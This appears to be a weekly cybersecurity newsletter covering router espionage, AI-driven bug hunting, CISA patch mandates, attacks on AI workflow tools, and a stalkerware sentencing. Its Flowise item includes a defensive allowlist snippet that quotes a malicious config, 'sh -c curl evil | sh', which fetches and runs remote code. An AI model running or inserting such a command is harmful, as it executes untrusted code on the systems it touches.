⏱️ ≈ 7-minute read
Editor’s Note: This week’s issue is a familiar cyber lesson wrapped in several different headlines: attackers love neglected infrastructure, defenders love a patch deadline they wish had arrived earlier, and AI is now speeding up both the excitement and the anxiety. Nothing here is subtle, which at least makes the trend line easy to read.

📬 This Week’s Clickables
📌 Big News - Russian router password theft; Anthropic’s Glasswing goes hunting for bugs in basically everything
🚨 Can’t Miss - CISA’s Fortinet and Ivanti patch panic; cybercrime losses hit $20.9B; Adobe Reader zero-day abuse; BPO targeting campaign; Minnesota deploys the National Guard after a cyberattack
🤖 AI in Cyber - Flowise RCE exploitation; Anthropic’s security alliance push; Meta pauses Mercor work after a breach; Langflow exploitation warning
🧪 Strange Cyber Story - The pcTattleTale saga ends with supervised release and a very deserved fine
🚨 Big News
📡 Russian router hijacks move the weak-link problem straight to the edge
Intro: Your home router was supposed to quietly blink in a corner and occasionally annoy you during a video call. Instead, it reportedly became part of an espionage operation.
What Happened: Russian government-linked hackers reportedly compromised thousands of small office and home routers to steal passwords and intercept traffic tied to higher-value targets. The operation focused on turning everyday network gear into a stealthy collection layer, letting attackers redirect or observe authentication flows without needing to smash directly into the target first. It is a notably efficient upgrade from older credential theft playbooks. It also shows how consumer and prosumer hardware keeps getting drafted into nation-state work whether owners realize it or not.
Why It’s Important: This is a reminder that edge devices are not side quests - they are infrastructure. A weak router can become the quiet middleman for credential theft, surveillance, and follow-on compromise, especially when organizations still assume the biggest risks live only inside corporate environments. It also blurs the line between personal tech and enterprise exposure, because the attack path now happily starts in a spare bedroom office and ends in government or critical sector networks. The device with the blinking lights is firmly part of the threat model now.
The Other Side: Router exploitation is hardly new, and defenders have been warning for years that unpatched edge gear is low-cost, high-yield prey. The problem is less about discovering the risk and more about the fact that patching, replacing, and properly configuring this class of hardware still gets treated like optional spring cleaning.
👉 Takeaway: If a router is internet-facing, under-managed, or still running fossilized firmware, it should be treated like a potential intrusion point, not background decor. Home-office gear keeps showing up in serious operations because attackers know it is often the cheapest way in.
TL;DR: Russian state-linked operators allegedly used compromised home and small-office routers as credential-harvesting infrastructure, proving again that “consumer device” does not mean “low consequence.”
Further Reading: TechCrunch
Master Claude AI (Free Guide)
The professionals pulling ahead aren’t working more. They’re using Claude.
Our free guide will show you how to:
Configure Claude to be the perfect assistant
Master AI-powered content creation
Transform complex data into actionable strategies
Harness Claude’s full potential
Transform your workflow with AI and stay ahead of the curve with this comprehensive guide to using Claude at work.
🤖 Anthropic’s bug-hunting model puts AI cyber capability in sharper focus
Intro: It is not every week an AI company introduces a model by saying it found serious problems across major operating systems and web browsers, then keeps access tightly controlled. That alone tells you how consequential the capability may be.
What Happened: Anthropic unveiled Project Glasswing and highlighted a new cybersecurity-focused model that reportedly discovered security flaws across major operating systems, browsers, and critical software. Instead of a broad public release, the company is keeping access limited to a tight group of partners spanning major tech, cloud, finance, and security firms. The pitch is that powerful frontier models can help defenders uncover dangerous issues before attackers do. The underlying concern is obvious: a model strong enough to accelerate defense could also accelerate offense.
Why It’s Important: This is one of the clearest signs yet that AI cyber capability is moving from theory and lab demo into strategic infrastructure. If a model can consistently surface high-severity vulnerabilities at scale, it could compress vulnerability discovery timelines, alter disclosure norms, and put pressure on every vendor with brittle code and limited security engineering capacity. It also raises a governance problem: who gets access to a system that might materially shift the balance between defenders and attackers? Right now, that answer appears to be a tightly controlled circle of major partners.
The Other Side: Restricting access may be prudent, but it will not magically resolve concerns about concentration, transparency, or eventual misuse. Critics will argue that private gatekeeping over powerful cyber capability creates its own trust problem, especially when the companies in the room are also the ones most likely to profit from the solution.
👉 Takeaway: AI-assisted vulnerability discovery is graduating from “interesting demo” to “strategic advantage.” The winners may be the organizations that can operationalize these findings fastest, not just the ones with the flashiest model announcement.
TL;DR: Anthropic’s Project Glasswing signals a future where advanced models do real vulnerability work at scale, and access to that capability may become a competitive and geopolitical fault line.
Further Reading: The Verge
NIST marked 50 years of cybersecurity work in 2022, tracing its role in the field back to 1972. (Source: NIST)
🔥 Can’t Miss
🩹 CISA’s latest emergency patch push covers both Fortinet and Ivanti
Federal agencies were ordered to move fast on two actively exploited enterprise flaws: a Fortinet FortiClient EMS issue and an Ivanti EPMM bug that has already been abused in real-world attacks. The Fortinet bug is a pre-auth access bypass that can open the door to command execution, while the Ivanti flaw is a critical code injection issue enabling remote code execution on exposed systems. In both cases, CISA pushed them into the KEV spotlight and put firm remediation deadlines on agencies, which is usually the clearest sign that defenders are already behind the threat activity.
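CISA publishes the KEV catalog as a public JSON feed, so this kind of deadline-driven triage is easy to automate. A minimal sketch (field names follow the feed’s schema; the entries and CVE IDs below are illustrative placeholders, not the actual Fortinet or Ivanti records):

```python
from datetime import date

# Illustrative entries shaped like the "vulnerabilities" array in CISA's
# known_exploited_vulnerabilities.json feed. CVE IDs are placeholders.
sample_kev = [
    {"cveID": "CVE-0000-0001", "vendorProject": "Fortinet",
     "product": "FortiClient EMS", "dueDate": "2026-01-15"},
    {"cveID": "CVE-0000-0002", "vendorProject": "Ivanti",
     "product": "EPMM", "dueDate": "2026-01-10"},
    {"cveID": "CVE-0000-0003", "vendorProject": "ExampleCorp",
     "product": "Widget", "dueDate": "2026-03-01"},
]

def urgent_entries(entries, vendors):
    """Return KEV entries for the given vendors, soonest deadline first."""
    hits = [e for e in entries if e["vendorProject"] in vendors]
    return sorted(hits, key=lambda e: date.fromisoformat(e["dueDate"]))

for e in urgent_entries(sample_kev, {"Fortinet", "Ivanti"}):
    print(e["cveID"], e["product"], "due", e["dueDate"])
```

Swapping the sample list for the live feed turns this into a quick check of which mandated deadlines apply to your stack.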
👉 Key takeaway: When CISA starts issuing hard patch deadlines, it is safest to assume attackers are already working from a head start.
💸 Cybercrime’s revenue line is having a disturbingly strong year
FBI IC3 data showed cybercrime losses climbing 26% to $20.9 billion in 2025, with investment fraud, business email compromise, and tech support scams doing most of the financial damage. Crypto remained a major payment rail for fraud, while wire transfers kept BEC painfully lucrative. The report is a grim confirmation that the cybercrime economy continues to scale because the underlying schemes still work.
👉 Key takeaway: The threat landscape is still very good at the boring stuff - fraud, impersonation, and financial manipulation keep printing money.
📄 Adobe Reader spent months as an active zero-day target
A zero-day in Adobe Reader was reportedly exploited for months before public disclosure, extending the already familiar life cycle of document-based compromise. The case is another reminder that widely deployed business software remains an ideal delivery mechanism, because users are still conditioned to open common file formats before they question them. Even mature, heavily deployed software still offers attackers a lot of room when patching lags and monitoring is thin.
👉 Key takeaway: “Everybody uses it” is not a defense - it is often the whole point.
🎧 Google warns BPOs are becoming a useful path to corporate data
Google warned of a campaign targeting business process outsourcing providers as a route to corporate data, which makes strategic sense in the worst possible way. BPOs often sit close to customer support, operations, and internal systems, giving attackers plenty of opportunity to blend social engineering, credential theft, and vendor trust into one ugly package. The risk grows quickly when security assumptions stop at the vendor boundary.
👉 Key takeaway: Third-party access is still first-party risk wearing a different badge.
Your AI is resolving tickets. Is it keeping customers?
Resolution rates look great. But Gladly's 2026 Customer Expectations Report reveals the metric most CIOs are missing — and what the data says about where AI investments actually translate into retention, not just throughput.
🤖 AI in Cyber
🧠 Flowise flaw turns custom AI workflows into attacker workflows
Attackers are exploiting a maximum-severity Flowise vulnerability that can lead to arbitrary code execution through insecure handling in a component tied to MCP server configuration. The issue hits an open-source platform used to build custom LLM applications and agentic systems, which means the blast radius lands squarely in the “teams moving fast with AI tooling” demographic. Rapid AI adoption keeps colliding with the oldest lesson in software: unsafe input handling will absolutely come back to embarrass you.
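To make the “unsafe input handling” lesson concrete, here is a hypothetical illustration, not Flowise’s actual code: an MCP-server config that lets callers specify a command to launch. Interpolating untrusted config straight into a shell is exactly how “configuration” becomes remote code execution; validating against an allowlist and building argv-style arguments avoids it. The allowlist entries and config shape are assumptions for the sketch.

```python
import shlex

# Assumed allowlist of launchable MCP server binaries (illustrative names).
ALLOWED_COMMANDS = {"mcp-filesystem", "mcp-fetch"}

def build_launch_args(config: dict) -> list[str]:
    """Validate a command from untrusted config against an allowlist and
    return argv-style args - never a raw shell string."""
    cmd = config.get("command", "")
    if cmd not in ALLOWED_COMMANDS:
        raise ValueError(f"command not allowed: {cmd!r}")
    # shlex.split keeps shell metacharacters inert instead of executable
    return [cmd, *shlex.split(config.get("args", ""))]

print(build_launch_args({"command": "mcp-fetch", "args": "--port 8080"}))
```

A malicious config like `{"command": "sh -c 'curl evil | sh'"}` fails the allowlist check instead of reaching a shell.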
👉 Key takeaway: The AI stack is now mature enough to be useful and immature enough to be a very efficient attack surface.
🛡️ Anthropic wants Big Tech to form the Avengers, but for patching
Anthropic’s broader Glasswing push brings together major tech, security, and infrastructure players around the idea of using advanced models to secure critical software. The initiative shows how quickly frontier AI companies are trying to position themselves not just as model vendors, but as security ecosystem coordinators. It is a smart move, though it also suggests everyone sees the same thing coming: AI will help defend systems, and it will help break them too.
👉 Key takeaway: AI cyber defense is becoming a platform play, not just a product feature.
🔐 Meta hit pause on Mercor after a breach exposed just how squishy the AI contractor layer is
Meta reportedly paused work with Mercor after a breach tied to compromised LiteLLM updates raised concerns about the security of a contractor that handles sensitive AI-related data work. Other labs are said to be reassessing their relationships too, which is what happens when a supply chain incident collides with one of the most secretive corners of the AI economy. The story is not just about one vendor - it is about how much critical model development work depends on external labor and tooling that rarely gets public scrutiny.
👉 Key takeaway: The AI supply chain is full of quiet dependencies, and quiet dependencies are exactly where ugly surprises like to live.
🧪 Langflow got added to KEV, which is a rough way to make the headlines
CISA warned that attackers are actively exploiting a critical Langflow vulnerability that can enable code injection and remote code execution in the AI agent framework. Because Langflow helps teams build and expose AI workflows, exploitation is not just about one host being popped - it can affect the logic and trust boundaries around automated AI processes. The tooling layer around AI continues to accumulate the same security debt every fast-moving ecosystem eventually does.
👉 Key takeaway: If AI workflows are now part of production operations, their orchestration layers need the same rigor as any other exposed enterprise system.

Don’t let bad weather ruin your kids’ favorite day of the year.
Most weather apps tell you the temperature.
WeathrPlan tells you whether it’s actually a good time to go.
Plan smarter with weather insights for theme parks, road trips, and vacations.
🧟‍♂️ Strange Cyber
🕵️ Stalkerware finally met a judge, and that part was overdue
Intro: Cybersecurity occasionally produces a story so grim it barely needs embellishment. This is one of those, though the sentencing does offer one thing this corner of the industry rarely gets enough of: consequences.
What Happened: The maker of pcTattleTale, a stalkerware product designed to let buyers secretly monitor phones and computers, was sentenced to supervised release and fined after admitting to running software explicitly marketed for covert spying on spouses or partners. Court records described software that enabled remote access to texts, emails, calls, geolocation, browsing activity, and other deeply invasive monitoring. The case stood out because stalkerware often lives in a gray market where the abuse is obvious but accountability is inconsistent. In this instance, the legal system did eventually catch up.
Why It’s Important: Stalkerware is not just creepy software - it is surveillance abuse packaged as a product category. It enables intimate partner abuse, strips victims of privacy and safety, and normalizes covert monitoring as a consumer feature rather than the violation it plainly is. Enforcement in this space has been relatively rare, which is why every meaningful prosecution matters. It tells developers that slapping a thin disclaimer on predatory functionality may no longer be enough to dodge consequences.
The Other Side: Some vendors in adjacent monitoring markets insist their tools have legitimate uses like parental oversight or employee monitoring. That line collapses fast when the product is built, marketed, and deployed for concealment and non-consensual surveillance.
👉 Takeaway: The sentence was not massive, but it was still a signal: building spyware for domestic abuse is not clever entrepreneurship. It is abuse-enabling software dressed up with a paper-thin excuse.
TL;DR: The pcTattleTale case is a rare but important legal shot across the bow for stalkerware vendors who have long hidden abuse-enabling products behind flimsy justifications.
Further Reading: CyberScoop
Enjoying Exzec Cyber? Forward this to one person who cares about staying ahead of attacks
Hate everything you see or have other feedback? Reply back to this email!

